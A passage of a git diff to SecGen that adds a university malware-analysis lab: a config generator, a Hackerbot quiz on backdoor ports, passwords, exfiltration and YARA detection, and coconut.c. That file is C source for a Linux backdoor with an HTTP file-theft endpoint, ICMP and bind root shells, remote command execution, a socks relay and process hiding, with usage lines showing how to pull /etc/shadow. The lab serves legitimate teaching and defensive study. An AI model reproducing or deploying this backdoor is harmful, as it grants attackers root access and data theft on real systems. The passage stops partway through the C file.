diff --git a/modules/bases/kali_light_msf/secgen_metadata.xml b/modules/bases/kali_light_msf/secgen_metadata.xml index e0bb499da..63ef8ee80 100644 --- a/modules/bases/kali_light_msf/secgen_metadata.xml +++ b/modules/bases/kali_light_msf/secgen_metadata.xml @@ -16,8 +16,8 @@ Kali Linux Rolling https://app.vagrantup.com/secgen/boxes/kali_light_msf/versions/1.0/providers/virtualbox.box - kali_linux_msf_20230615 - kali-linux-msf-20230615 + kali-linux-mfs-20231114 + kali-linux-mfs-20231114 https://app.vagrantup.com/secgen diff --git a/modules/generators/structured_content/coconut_config/coconut_config.pp b/modules/generators/structured_content/coconut_config/coconut_config.pp new file mode 100644 index 000000000..e69de29bb diff --git a/modules/generators/structured_content/coconut_config/manifests/.no_puppet b/modules/generators/structured_content/coconut_config/manifests/.no_puppet new file mode 100644 index 000000000..e69de29bb diff --git a/modules/generators/structured_content/coconut_config/secgen_local/local.rb b/modules/generators/structured_content/coconut_config/secgen_local/local.rb new file mode 100644 index 000000000..0f7140f15 --- /dev/null +++ b/modules/generators/structured_content/coconut_config/secgen_local/local.rb @@ -0,0 +1,92 @@ +#!/usr/bin/ruby +require_relative '../../../../../lib/objects/local_string_encoder.rb' +class CocoConfigGenerator < StringEncoder + attr_accessor :pack_binary + attr_accessor :include_source + attr_accessor :welcome_msg_code + attr_accessor :bd_timeout + attr_accessor :http_bd_port + attr_accessor :icmp_bd_port + attr_accessor :bind_bd_port + attr_accessor :transport_port + attr_accessor :bd_password + + def initialize + super + self.module_name = 'Account Generator / Builder' + self.pack_binary = '' + self.include_source = '' + self.welcome_msg_code = '' + self.bd_timeout = '' + self.http_bd_port = '' + self.icmp_bd_port = '' + self.bind_bd_port = '' + self.transport_port = '' + self.bd_password = '' + end + + def encode_all + coconut_hash = {} + coconut_hash['pack_binary'] = self.pack_binary + coconut_hash['include_source'] = self.include_source + coconut_hash['welcome_msg_code'] = self.welcome_msg_code + coconut_hash['bd_timeout'] = self.bd_timeout + coconut_hash['http_bd_port'] = self.http_bd_port + coconut_hash['icmp_bd_port'] = self.icmp_bd_port + coconut_hash['bind_bd_port'] = self.bind_bd_port + coconut_hash['transport_port'] = self.transport_port + coconut_hash['bd_password'] = self.bd_password + + self.outputs << coconut_hash.to_json + end + + def get_options_array + super + [['--pack_binary', GetoptLong::REQUIRED_ARGUMENT], + ['--include_source', GetoptLong::REQUIRED_ARGUMENT], + ['--welcome_msg_code', GetoptLong::REQUIRED_ARGUMENT], + ['--bd_timeout', GetoptLong::REQUIRED_ARGUMENT], + ['--http_bd_port', GetoptLong::REQUIRED_ARGUMENT], + ['--icmp_bd_port', GetoptLong::REQUIRED_ARGUMENT], + ['--bind_bd_port', GetoptLong::REQUIRED_ARGUMENT], + ['--transport_port', GetoptLong::REQUIRED_ARGUMENT], + ['--bd_password', GetoptLong::REQUIRED_ARGUMENT]] + end + + def process_options(opt, arg) + super + case opt + when '--pack_binary' + self.pack_binary << arg; + when '--include_source' + self.include_source << arg; + when '--welcome_msg_code' + self.welcome_msg_code << arg; + when '--bd_timeout' + self.bd_timeout << arg; + when '--http_bd_port' + self.http_bd_port << arg; + when '--icmp_bd_port' + self.icmp_bd_port << arg; + when '--bind_bd_port' + self.bind_bd_port << arg; + when '--transport_port' + self.transport_port << arg; + when '--bd_password' + self.bd_password << arg; + end + end + + def encoding_print_string + 'pack_binary: ' + self.pack_binary.to_s + print_string_padding + + 'include_source: ' + self.include_source.to_s + print_string_padding + + 'welcome_msg_code: ' + self.welcome_msg_code.to_s + print_string_padding + + 'bd_timeout: ' + self.bd_timeout.to_s + print_string_padding + + 'http_bd_port: ' + self.http_bd_port.to_s + print_string_padding + + 'icmp_bd_port: ' + self.icmp_bd_port.to_s + print_string_padding + + 'bind_bd_port: ' + self.bind_bd_port.to_s + print_string_padding + + 'transport_port: ' + self.transport_port.to_s + print_string_padding + + 'bd_password: ' + self.bd_password.to_s + end +end + +CocoConfigGenerator.new.run diff --git a/modules/generators/structured_content/coconut_config/secgen_metadata.xml b/modules/generators/structured_content/coconut_config/secgen_metadata.xml new file mode 100644 index 000000000..2bb3f7d99 --- /dev/null +++ b/modules/generators/structured_content/coconut_config/secgen_metadata.xml @@ -0,0 +1,96 @@ + + + + Coconut Config Generator + Thomas Shaw + MIT + Generates all parameters required by the coconut malware sample's configuration + + coconut_config_generator + coconut_config + linux + + pack_binary + include_source + welcome_msg_code + bd_timeout + http_bd_port + icmp_bd_port + bind_bd_port + transport_port + bd_password + + + true + + + false + + + + + 6 + + + 1 + + + + + + + 60 + + + 300 + + + + + + + 1025 + + + 65535 + + + + + + + 1025 + + + 65535 + + + + + + + 1025 + + + 65535 + + + + + + + 1025 + + + 65535 + + + + + + + + json + diff --git a/modules/generators/structured_content/hackerbot_config/rema_coconut/manifests/.no_puppet b/modules/generators/structured_content/hackerbot_config/rema_coconut/manifests/.no_puppet new file mode 100644 index 000000000..e69de29bb diff --git a/modules/generators/structured_content/hackerbot_config/rema_coconut/rema_coconut.pp b/modules/generators/structured_content/hackerbot_config/rema_coconut/rema_coconut.pp new file mode 100644 index 000000000..e69de29bb diff --git a/modules/generators/structured_content/hackerbot_config/rema_coconut/secgen_local/local.rb b/modules/generators/structured_content/hackerbot_config/rema_coconut/secgen_local/local.rb new file mode 100644 index 000000000..8be33382c --- /dev/null +++ b/modules/generators/structured_content/hackerbot_config/rema_coconut/secgen_local/local.rb @@ -0,0 +1,48 @@ +#!/usr/bin/ruby +require_relative '../../../../../../lib/objects/local_hackerbot_config_generator.rb' + +class REMACoconut < HackerbotConfigGenerator + + attr_accessor :desktop_ip + attr_accessor :hackerbot_server_ip + attr_accessor :victim_server_ip + attr_accessor :coconut_config + + def initialize + super + self.module_name = 'Hackerbot Config Generator REMA Coconut' + self.title = 'REMA Coconut' + + self.local_dir = File.expand_path('../../', __FILE__) + self.templates_path = "#{self.local_dir}/templates/" + self.config_template_path = "#{self.local_dir}/templates/rema_coconut.xml.erb" + self.html_template_path = "#{self.local_dir}/templates/labsheet.html.erb" + self.desktop_ip = '' + self.hackerbot_server_ip = '' + self.victim_server_ip = '' + self.coconut_config = '' + end + + def get_options_array + super + [['--desktop_ip', GetoptLong::REQUIRED_ARGUMENT], + ['--coconut_config', GetoptLong::REQUIRED_ARGUMENT], + ['--victim_server_ip', GetoptLong::REQUIRED_ARGUMENT], + ['--hackerbot_server_ip', GetoptLong::REQUIRED_ARGUMENT]] + end + + def process_options(opt, arg) + super + case opt + when '--desktop_ip' + self.desktop_ip << arg; + when '--hackerbot_server_ip' + self.hackerbot_server_ip << arg; + when '--victim_server_ip' + self.victim_server_ip << arg; + when '--coconut_config' + self.coconut_config << arg; + end + end +end + +REMACoconut.new.run \ No newline at end of file diff --git a/modules/generators/structured_content/hackerbot_config/rema_coconut/secgen_metadata.xml b/modules/generators/structured_content/hackerbot_config/rema_coconut/secgen_metadata.xml new file mode 100644 index 000000000..c69bb4636 --- /dev/null +++ b/modules/generators/structured_content/hackerbot_config/rema_coconut/secgen_metadata.xml @@ -0,0 +1,50 @@ + + + + Hackerbot config for the REMA coconut analysis lab + Thomas Shaw + Mo Hassan + GPLv3 + Generates a config file for a Hackerbot for the REMA coconut analysis lab. + + hackerbot_config + linux + + flags + root_password + desktop_ip + hackerbot_server_ip + victim_server_ip + + coconut_config + + + + + vagrant + + + + + + + + + + + + + + + + + + + puppet + + + hackerbot + + diff --git a/modules/generators/structured_content/hackerbot_config/rema_coconut/shared/labsheet.html.erb b/modules/generators/structured_content/hackerbot_config/rema_coconut/shared/labsheet.html.erb new file mode 100644 index 000000000..fefc25e1e --- /dev/null +++ b/modules/generators/structured_content/hackerbot_config/rema_coconut/shared/labsheet.html.erb @@ -0,0 +1,29 @@ + + + <%= self.title %> + + + + + +
+ + <%= self.html_rendered %> + +
+ + + diff --git a/modules/generators/structured_content/hackerbot_config/rema_coconut/shared/license.md.erb b/modules/generators/structured_content/hackerbot_config/rema_coconut/shared/license.md.erb new file mode 100644 index 000000000..2527284e4 --- /dev/null +++ b/modules/generators/structured_content/hackerbot_config/rema_coconut/shared/license.md.erb @@ -0,0 +1,6 @@ +## License +This lab by Mohamed Hassan and Thomas Shaw at Leeds Beckett University is licensed under a [*Creative Commons Attribution-ShareAlike 4.0 License*](https://creativecommons.org/licenses/by-sa/4.0/). + +This work is licensed under a creative common "Attribution-NonCommercial-ShareAlike 4.0" license. A human-readable summary of the license is the following: You are free to copy and redistribute the material in any medium or format. You must give appropriate credit. If you remix, transform, or build upon the material, you must distribute your contributions under the same license as the original. You may not use the material for commercial purposes. See at https://creativecommons.org/licenses/by-sa/4.0/ + +![small](images/leedsbeckett-logo.png) diff --git a/modules/generators/structured_content/hackerbot_config/rema_coconut/templates/intro.md.erb b/modules/generators/structured_content/hackerbot_config/rema_coconut/templates/intro.md.erb new file mode 100644 index 000000000..fdd8d8e79 --- /dev/null +++ b/modules/generators/structured_content/hackerbot_config/rema_coconut/templates/intro.md.erb @@ -0,0 +1,43 @@ +# Malware Behaviour - Reverse Engineering and Analysis of the Coconut Malware Sample + +## Getting started +### VMs in this lab + +==Start these VMs== (if you haven't already): +- hackerbot_server: <%= $hackerbot_server_ip %> (leave it running, you don't log into this) +- desktop: <%= $desktop_ip %> +- victim_server: <%= $victim_server_ip %> + +### Your login details for the "desktop" VM +User: <%= $main_user %> +Password: tiaspbiqe2r (**t**his **i**s **a** **s**ecure **p**assword **b**ut **i**s **q**uite **e**asy **2** **r**emember) + +You won't login to the hackerbot_server, but the VM needs to be running to complete the lab. + +### For marks in the module +1. **You need to submit flags**. Note that the flags and the challenges in your VMs are different to other's in the class. Flags will be revealed to you as you complete challenges throughout the module. Flags look like this: ==flag{*somethingrandom*}==. Submit your flags in Hacktivity to register your progress in the lab. +2. **You need to document the work and your solutions in a Log Book**. This needs to include screenshots (including the flags) of how you solved each Hackerbot challenge and a writeup describing your solution to each challenge, and answering any "Log Book Questions". The Log Book will be submitted later in the semester. + +## Meet Hackerbot! +![small-right](images/skullandusb.svg) + +This exercise involves Hackerbot, a chatbot who will interact with you and your system. If you satisfy Hackerbot by completing the challenges she will reveal flags to you. + +**On the desktop VM:** + +==Open Pidgin and send some messages to Hackerbot:== + +- Try asking Hackerbot some questions +- Send "help" +- Send "list" +- Send "hello" + +Work through the following exercises, completing the Hackerbot challenges as noted. + +--- + +# Purpose + +The victim_server has been infected with a malware sample. Your desktop analysis machine has a copy of the binary sample which is running on the victim_server at the path: /home/<%= $main_user %>/malware/coconut. + +This task involves analysing the coconut malware sample. Hackerbot will provide you with a series of practical challenges and quiz questions about the malware sample and reward you with flags for successful completion. Further flags can be found on the infected system (victim_server). \ No newline at end of file diff --git a/modules/generators/structured_content/hackerbot_config/rema_coconut/templates/labsheet.html.erb b/modules/generators/structured_content/hackerbot_config/rema_coconut/templates/labsheet.html.erb new file mode 100644 index 000000000..1eea6befb --- /dev/null +++ b/modules/generators/structured_content/hackerbot_config/rema_coconut/templates/labsheet.html.erb @@ -0,0 +1,114 @@ + + + <%= self.title %> + + + + + +
+ <%= self.html_TOC_rendered %> +
+ +
+ <%= self.html_rendered %> +
+ + + diff --git a/modules/generators/structured_content/hackerbot_config/rema_coconut/templates/license.md.erb b/modules/generators/structured_content/hackerbot_config/rema_coconut/templates/license.md.erb new file mode 100644 index 000000000..2527284e4 --- /dev/null +++ b/modules/generators/structured_content/hackerbot_config/rema_coconut/templates/license.md.erb @@ -0,0 +1,6 @@ +## License +This lab by Mohamed Hassan and Thomas Shaw at Leeds Beckett University is licensed under a [*Creative Commons Attribution-ShareAlike 4.0 License*](https://creativecommons.org/licenses/by-sa/4.0/). + +This work is licensed under a creative common "Attribution-NonCommercial-ShareAlike 4.0" license. A human-readable summary of the license is the following: You are free to copy and redistribute the material in any medium or format. You must give appropriate credit. If you remix, transform, or build upon the material, you must distribute your contributions under the same license as the original. You may not use the material for commercial purposes. See at https://creativecommons.org/licenses/by-sa/4.0/ + +![small](images/leedsbeckett-logo.png) diff --git a/modules/generators/structured_content/hackerbot_config/rema_coconut/templates/rema_coconut.xml.erb b/modules/generators/structured_content/hackerbot_config/rema_coconut/templates/rema_coconut.xml.erb new file mode 100644 index 000000000..4cde889dc --- /dev/null +++ b/modules/generators/structured_content/hackerbot_config/rema_coconut/templates/rema_coconut.xml.erb @@ -0,0 +1,419 @@ +<% + require 'json' + require 'securerandom' + require 'digest/sha1' + require 'fileutils' + require 'erb' + require 'openssl' + + if self.accounts.empty? + abort('Sorry, you need to provide an account') + end + $coconut_config = JSON.parse(self.coconut_config) + $first_account = JSON.parse(self.accounts.first) + + $main_user = $first_account['username'].to_s + + $root_password = self.root_password + $desktop_ip = self.desktop_ip + $hackerbot_server_ip = self.hackerbot_server_ip + $victim_server_ip = self.victim_server_ip + $flags = self.flags + + $path_to_sample = "/home/#{$main_user}/malware/coconut" + + $welcome_msg_code = $coconut_config['welcome_msg_code'] + $http_bd_port = $coconut_config['http_bd_port'] + $bd_timeout = $coconut_config['bd_timeout'] + $icmp_bd_port = $coconut_config['icmp_bd_port'] + $bind_bd_port = $coconut_config['bind_bd_port'] + $transport_port = $coconut_config['transport_port'] + $bd_password = $coconut_config['bd_password'] + + $q_bindport_rand = rand(1024..49151) + + REQUIRED_FLAGS = 11 + while $flags.length < REQUIRED_FLAGS + $flags << "flag{#{SecureRandom.hex}}" + Print.err "Warning: Not enough flags provided to hackerbot_config generator, some flags won't be tracked/marked!" + end + + $yara_flag_1 = $flags.pop + $yara_flag_2 = $flags.pop + + def get_binding + binding + end +-%> + + + + + + Hackerbot + + config/AIML + + + sshpass -p <%= $root_password %> ssh -oStrictHostKeyChecking=no root@{{chat_ip_address}} /bin/bash + + + + + Your system is about to be hacked. I'll do what I can hold them off, but you are going to have to work with me to protect yourself. I'll cough up some flags if you work with me. + + + Let me know when you are 'ready', if you want to move on to another attack, say 'next', or 'previous' and I'll move things along. + When you are ready, simply say 'ready'. + 'Ready'? + Better hurry, the attack is imminent... Let me know when you're 'ready'. + Ok, I'll do what I can to move things along... + Moving things along to the next attack... + Ok, next attack... + Ok, I'll do what I can to back things up... + Ok, previous attack... + Ok, backing up. + Ok, skipping it along. + Let me see what I can do to goto that attack. + That was the last attack for now. You can rest easy, until next time... (End.) + That was the last attack. Game over? + You are back to the beginning! + This is where it all began. + Ok. Gaining shell access, and running post command... + Hacking in progress... + Attack underway... + Here we go... + We are in to your system. + You are pwned. + We have shell. + Let me know when you are 'ready', if you want to move on to another attack, say 'next', or 'previous' and I'll move things along. + Say 'ready', 'next', or 'previous'. + + + I am waiting for you to say 'ready', 'next', 'previous', 'list', 'goto *X*', or 'answer *X*' + Say "The answer is *X*". + There is no question to answer + Correct + Incorrect + That's not possible. + Wouldn't you like to know. + + + Oh no. Failed to get shell... You need to let us in. + + + + REMA Malware Behaviour - Coconut + <%= ERB.new(File.read self.templates_path + 'intro.md.erb').result(self.get_binding) %> +
+<%= File.read self.templates_path + 'resources.md.erb' %> +| +<%= File.read self.templates_path + 'license.md.erb' %> + +Randomised instance generated by [SecGen](http://github.com/cliffe/SecGen) (<%= Time.new.to_s %>) +
+ + true + + + + + + I have a question that will require you to perform some analysis on the coconut malware sample, found at: <%= $path_to_sample %> + + echo 'OK' + false + + + + OK + OK... + + + + OK.. + OK.. + + + + Something went wrong. + + + + What is the name of the packing software used to compress the code in the coconut malware sample? + UPX + Well done:) <%= $flags.pop %> + + + + + + + The next question is related to the state of the infected system. Perform a network scan to assist you with the following question. + + echo 'OK' + false + + + + OK + OK... + + + + OK.. + OK.. + + + + Something went wrong. + + + + One of the users on the infected system has run the coconut malware sample. Which port has the malware sample opened on the infected system? + <%= $http_bd_port %> + Well done:) <%= $flags.pop %> + + + + + + + I have another question that will require you to perform further analysis on the coconut malware sample, found at: <%= $path_to_sample %> + + echo 'OK' + false + + + + OK + OK... + + + + OK.. + OK.. + + + + Something went wrong. + + + + What is the name of the function that launches the icmp shell? (include brackets, e.g. "The answer is function_name()"). + icmp_shell() + Well done:) <%= $flags.pop %> + + + + + + + I have another question that will require you to perform further analysis on the coconut malware sample, found at: <%= $path_to_sample %> + + echo 'OK' + false + + + + OK + OK... + + + + OK.. + OK.. + + + + Something went wrong. + + + + Which port does the ICMP backdoor open a shell on? + <%= $icmp_bd_port %> + Well done:) <%= $flags.pop %> + + + + + + + This question is related to the activity timeout on the shell sessions. + + echo 'OK' + false + + + + OK + OK... + + + + OK.. + OK.. + + + + Something went wrong. + + + + How many seconds does the bind shell backdoor stay active for, before automatically closing due to inactivity? (e.g. "The answer is n", where n is the number of seconds as an integer) + <%= $bd_timeout %> + Well done:) <%= $flags.pop %> + + + + + + + This question is related to the password used to access the shell sessions. + + echo 'OK' + false + + + + OK + OK... + + + + OK.. + OK.. + + + + Something went wrong. + + + + What is the password used to access the backdoor shell? + <%= $bd_password %> + Well done:) <%= $flags.pop %> + + + + + + + The next question is related the backdoor shell session. + + echo 'OK' + false + + + + OK + OK... + + + + OK.. + OK.. + + + + Something went wrong. + + + + What is the code attached to the welcome message that is presented to the user when they successfully access the backdoor? + <%= $welcome_msg_code %> + Well done:) <%= $flags.pop %> + + + + + + + The next question is related the http backdoor's bind shell functionality. + + echo 'OK' + false + + + + OK + OK... + + + + OK.. + OK.. + + + + Something went wrong. + + + + The http backdoor contains functionality to open a bind shell on a specified port. Which URL can be accessed over HTTP to trigger the malware sample to open a bind shell backdoor on port <%= $q_bindport_rand %>? + <%= $victim_server_ip %>:<%= $http_bd_port %>/bindport:<%= $q_bindport_rand %> + Well done:) <%= $flags.pop %> + + + + + + + This challenge will require you to use one of the backdoors (of your choosing) to exfiltrate a file from the infected system. One of the users has a file containing top secret information within their home directory. Find the file and store a local copy on your VM at the path: /home/<%= $main_user %>/top_secret_file + + shasum /home/<%= $main_user %>/top_secret_file + + + OK + Ok... + + + 9737a2f11c391517bc23b8f77d441f7c3d27e545 /home/<%=$main_user %>/top_secret_file + Well done :) <%=$flags.pop %> + + + + Your top_secret_file does not contain the same data as the server's. + + + + + + + This challenge involves create a yara rule to detect the malware sample. Create a file containing your yara rule at /home/<%=$main_user %>/coconut.yara + + upx_sample_check=$(xxd /home/<%=$main_user %>/malware/coconut | grep UPX > /dev/null; echo $?); ls /home/<%=$main_user %>/coconut.yara; yara_file=$?; yara /home/<%= $main_user%>/coconut.yara /home/<%= $main_user%>/malware/coconut; yara_err=$?; positive_match=$(yara /home/<%= $main_user%>/coconut.yara /home/<%= $main_user%>/malware/coconut | wc -l); bin_false_pos_n=$(yara /home/<%= $main_user%>/coconut.yara /bin/ | wc -l); usr_bin_false_pos_n=$(yara /home/<%= $main_user%>/coconut.yara /usr/bin/ | wc -l); bin_false_pos=$(if (( $bin_false_pos_n > 0 )); then echo "T"; else echo "F";fi;); usr_bin_false_pos=$(if (( $usr_bin_false_pos_n > 0 )); then echo "T"; else echo "F";fi;); echo $upx_sample_check$yara_file$yara_err$positive_match$bin_false_pos$usr_bin_false_pos + + + 1\d\d\d[FT][FT] + Your coconut malware sample does not appear to be the original UPX packed file. Try revert your VM to its initial state and try again. + + + 02\d\d[FT][FT] + No file found at /home/<%=$main_user %>/coconut.yara - have you created your rules file? + + + 001\d[FT][FT] + There was an error when attempting to run your yara rule. Check your syntax and review any error messages from yara. + + + 0000[FT][FT] + Your rules file is correctly formatted, but your rule does not match the coconut malware sample. + + + 0001FF + Well done! Your rule matches the coconut malware sample and does not trigger a false positive on the system binaries. Here are some flags: <%= $yara_flag_1 %> <%= $yara_flag_2 %> (note: you may have already received the first one for partial completion of this challenge) + + + + 0001FT + Well done. Your rule is matching the coconut malware sample, here's a flag: <%= $yara_flag_1 %>. Unfortunately your rule generated false positives with system binaries. Improve your rule to earn another flag. + + + Something was wrong with your rule. + + + + \ No newline at end of file diff --git a/modules/generators/structured_content/hackerbot_config/rema_coconut/templates/resources.md.erb b/modules/generators/structured_content/hackerbot_config/rema_coconut/templates/resources.md.erb new file mode 100644 index 000000000..1767599e5 --- /dev/null +++ b/modules/generators/structured_content/hackerbot_config/rema_coconut/templates/resources.md.erb @@ -0,0 +1,3 @@ +## References + +[1] Stinson, Douglas R. and Paterson, Maura B. *Cryptography Theory and Practice*. 4th edition. CRC Press, 2019. \ No newline at end of file diff --git a/modules/utilities/unix/audit_tools/reversing_tools/manifests/install.pp b/modules/utilities/unix/audit_tools/reversing_tools/manifests/install.pp index 1e605bc8e..000cc9065 100644 --- a/modules/utilities/unix/audit_tools/reversing_tools/manifests/install.pp +++ b/modules/utilities/unix/audit_tools/reversing_tools/manifests/install.pp @@ -1,7 +1,7 @@ class reversing_tools::install { Exec { path => ['/bin', '/usr/bin', '/usr/local/bin', '/sbin', '/usr/sbin'] } - ensure_packages(['gdb', 'git', 'ltrace', 'strace', 'valgrind', 'pax-utils', 'binwalk', 'vbindiff', 'ssdeep', 'pyew', 'gcc-multilib']) + ensure_packages(['gdb', 'git', 'ltrace', 'strace', 'valgrind', 'pax-utils', 'binwalk', 'vbindiff', 'ssdeep', 'pyew', 'gcc-multilib','yara']) # java ensure_packages(['procyon-decompiler']) diff --git a/modules/utilities/unix/malware/coconut/coconut.pp b/modules/utilities/unix/malware/coconut/coconut.pp new file mode 100644 index 000000000..d8b2334ae --- /dev/null +++ b/modules/utilities/unix/malware/coconut/coconut.pp @@ -0,0 +1,2 @@ +require coconut::install +require coconut::service diff --git a/modules/utilities/unix/malware/coconut/files/coconut.c b/modules/utilities/unix/malware/coconut/files/coconut.c new file mode 100644 index 000000000..9be54e5b7 --- /dev/null +++ b/modules/utilities/unix/malware/coconut/files/coconut.c @@ -0,0 +1,805 @@ +/************************************************************************ +* coconut.c is based on allinone.c +* +* a Http server, +* a sockets transmit server, +* a shell backdoor, +* a icmp backdoor, +* a bind shell backdoor, +* a like http shell, +* it can translate file from remote host, +* it can give you a socks5 proxy, +* it can use for to attack, jumps the extension, Visits other machines. +* it can give you a root shell.:) +* +* Usage: +* compile: +* gcc -o allinone allinone.c -lpthread +* run on target: +* ./coconut +* +* 1.httpd server +* Client: +* http://target:9009/givemefile/etc/passwd +* lynx -dump http://target:9009/givemefile/etc/shadow > shadow +* or wget http://target:9009/givemefile/etc/shadow +* +* 2.icmp backdoor +* Client: +* ping -l 101 target (on windows) +* ping -s 101 -c 4 target (on linux) +* nc target 8090 +* allesgute:) --> your password +* +* 3.shell backdoor +* Client: +* nc target 9009 +* allesgute:) --> your password +* +* 4.bind a root shell on your port +* Client: +* http://target:9009/bindport:8899 +* nc target 8899 +* allesgute:) --> your password +* +* 5.sockets transmit +* Client: +* http://target:9009/socks/:local listen port::you want to tran ip:::you want to tran port +* http://target:9009/socks/:1080::192.168.0.1:::21 +* nc target 1080 +* +* 6.http shell +* Client: +* http://target:9009/givemeshell:ls -al (no pipe) +* +* ps: +* All bind shell have a passwd, default is: allesgute:) +* All bind shell will close, if Two minutes do not have the connection. +* All bind shell only can use one time until reactivates. +* +* Test on redhat 6.1/6.2/7.0/7.1/7.2 (maybe others) +* Thx bkbll's Transmit code, and thx Neil,con,iceblood for test. +* +************************************************************************/ +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + + +#define HTTPD_PORT 9009 +#define BIND_PORT 8899 +#define ICMP_PORT 8090 +#define TRAN_PORT 1080 +#define SIZEPACK 101 +#define MAXSIZE 32768 +#define TIMEOUT 120 +#define CONNECT_NUMBER 1 +#define HIDEME "[login] " +#define HIDEICMP "[su] " +#define HIDEFILE "[bash] " +#define GET_FILE "givemefile" +#define SHELL_NAME "givemeshell" +#define BIND_NAME "bindport" +#define TRAN_NAME "socks" +#define DISPART ":" +#define DISPART1 "::" +#define DISPART2 ":::" +#define $GNUPLIB "allesgute:)" +#define _$PRINT "\r\n========= Welcome to Year 2068 =========\r\n========== :) =========\r\n\r\nYour command: \0" +#define GIVEPASS "\r\nEnter Your password: \0" + +#define max(a, b) (a)>(b)?(a) : (b) + +int maxfd, infd, outfd; +unsigned char ret_buf[32768]; + +int daemon_init(); +void sig_chid(); +int TCP_listen(); +char* read_file(); +ssize_t writen_file(); +int bind_shell(); +int get_shell(); +int icmp_shell(); +int socks(); +int create_socket(); +int create_serv(); +int client_connect(); +int quit(); +void out2in(); +char x2c(); +void unescape_url(); +void plustospace(); + +int main(int argc, char *argv[]) +{ + int fd, len, i, icmp; + int csocket; + struct sockaddr_in caddr; + char readstr[4000]; + char *cbuf; + pid_t pid; + + signal(SIGCHLD, sig_chid); + daemon_init(); + + if((pid = fork()) == -1) exit(0); + if(pid <= 0) + { + strcpy(argv[0], HIDEICMP); + icmp_shell(); + } + + fd = TCP_listen(HTTPD_PORT); + if(fd <= 0) return -1; + + for(;;) + { + strcpy(argv[0], HIDEME); + + len = sizeof(caddr); + if((csocket = accept(fd, &caddr, &len)) < 0) continue; + if((pid = fork()) == -1) continue; + if(pid <= 0) + { + strcpy (argv[0], HIDEFILE); + i = recv(csocket, readstr, 4000,0); + if (i == -1) break; + if( readstr[ i -1 ] != '\n' ) break; + readstr [i] = '\0'; + cbuf = read_file(readstr, csocket); + close(csocket); + } + close(csocket); + } + close(fd); + return(1); +} + + +int daemon_init() +{ + struct sigaction act; + int i, maxfd; + + if(fork() != 0) exit(0); + if(setsid() < 0) return(-1); + + act.sa_handler = SIG_IGN; + act.sa_flags = 0; + + sigaction(SIGHUP, &act, 0); + + if(fork() != 0) exit(0); + + chdir("/tmp"); + umask(0); + maxfd = sysconf(_SC_OPEN_MAX); + for(i=0; i0); + printf("children %d died\n", pid); + return; +} + +int TCP_listen(int port) +{ + struct sockaddr_in laddr ; + int fd; + socklen_t len ; + fd = socket(AF_INET, SOCK_STREAM, 0); + len = sizeof(laddr) ; + memset(&laddr, 0, len) ; + laddr.sin_addr.s_addr = htonl(INADDR_ANY) ; + laddr.sin_family = AF_INET ; + laddr.sin_port = htons(port) ; + if((bind(fd, (const struct sockaddr *)&laddr, len))) return(-1); + if(listen(fd, 5)) return(-1); + return(fd); +} + +char * read_file(char *buf, int fd) +{ + char *erro= + "Content-type: text/html\n\n" + "HTTP/1.1 404 Not Found\n" + "Date: 1 Jan 2060 03:19:55 GMT\n" + "Server: Apache/99.98.97 (RoboUnix)\n" + "Connection: close\n" + "Content-Type: text/html\n\n" + "\n" + "\n" + "404 Not Found\n" + "\n" + "

Not Found

\n" + "The requested URL was not found on this server.

\n" + "

\n" + "
Apache/99.98.97 Server at localhost Port 9009
\n" + "\n\n"; + + char *bindok= + "Content-type: text/html\n\n" + "\nBind Shell ok.:)\n" + "\n" + "

\n" + "\n" + "You get it, goodluck! :-)\n" + "


\n" + "\n\n"; + + char *tranok= + "Content-type: text/html\n\n" + "\nTran ok.:)\n" + "\n" + "

\n" + "\n" + "Tran ok!\n" + "


\n" + "\n\n"; + + char *httpok1= + "Content-type: text/html\n\n" + "\nShell ok.:)\n" + "\n" + "
\n" + "
\n";
+
+	char *httpok2=
+	"

\n" + "\n\n"; + + char *yourcom= + "Your Command:\n"; + + char *br= + "
\n"; + + int listenp, targetp, i, j, c, bport; + char *cmd, *par, *op, *hp, *tp, *targeth, *command; + char *swap_file = "/tmp/tmp.txt"; + char *setpath = "PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:."; + FILE *f; + + cmd = buf; + par = strstr(cmd, $GNUPLIB); + if(par != NULL) + { + get_shell(fd); + exit(0); + } + + par = strstr(cmd, BIND_NAME); + op = strstr(cmd, DISPART); + if(par != NULL && op != NULL) + { + bport = atoi(op + strlen(DISPART)); + if(bport <= 0) + bport = BIND_PORT; + write(fd, bindok, strlen(bindok)); + close(fd); + bind_shell(bport); + exit(0); + } + + par = strstr(cmd, TRAN_NAME); + op = strstr(cmd, DISPART); + hp = strstr(cmd, DISPART1); + tp = strstr(cmd, DISPART2); + if(par != NULL && op != NULL && hp != NULL && tp != NULL) + { + listenp = atoi(op + strlen(DISPART)); + if(listenp <= 0) + listenp = TRAN_PORT; + targetp = atoi(tp + strlen(DISPART2)); + if(targetp <= 0) + targetp = 23; + + hp = (hp + strlen(DISPART1)); + targeth = strncpy(ret_buf, hp,strlen(hp) - strlen(tp)); + targeth[strlen(hp) - strlen(tp)] = '\0'; + + write(fd, tranok, strlen(tranok)); + close(fd); + socks(listenp, targeth, targetp); + exit(0); + } + + par = strstr(cmd, SHELL_NAME); + op = strstr(cmd, DISPART); + if(par != NULL && op != NULL) + { + tp = buf + 5 + strlen(SHELL_NAME) + strlen(DISPART); + hp = strstr(tp, "HTTP"); + if(hp != NULL) *hp = '\0'; + tp[strlen(tp) - 1] = 0; + plustospace(tp); + unescape_url(tp); + + c = j = strlen(tp); + tp[j] = ' ';j++; + tp[j] = ' ';j++; + tp[j] = '>';j++; + tp[j] = ' ';j++; + for(i = 0; i <= strlen(swap_file); i++, j++) + { + tp[j] = swap_file[i]; + } + tp[j + strlen(swap_file)] = '\0'; + + command = tp; + setuid(0); + setgid(0); + chdir("/tmp"); + putenv(setpath); + system(command); + + f = fopen(swap_file, "r"); + if (f == NULL) + { + writen_file(fd, erro, strlen(erro)); + return erro; + } + + writen_file(fd, httpok1, strlen(httpok1)); + writen_file(fd, yourcom, strlen(yourcom)); + writen_file(fd, command, c); + writen_file(fd, br, strlen(br)); + writen_file(fd, br, strlen(br)); + while( !feof(f) ) + { + i = fread(ret_buf, 1, 32768, f); + if (i == 0) break; + writen_file(fd, ret_buf, i); + } + fclose(f); + writen_file(fd, br, strlen(br)); + writen_file(fd, httpok2, strlen(httpok2)); + remove(swap_file); + exit(0); + } + + par = NULL; + par = strstr(cmd, GET_FILE); + if(par != NULL) + { + op = buf + 5 + strlen(GET_FILE); + tp = strstr(op, "HTTP"); + if(tp != NULL) *tp = '\0'; + 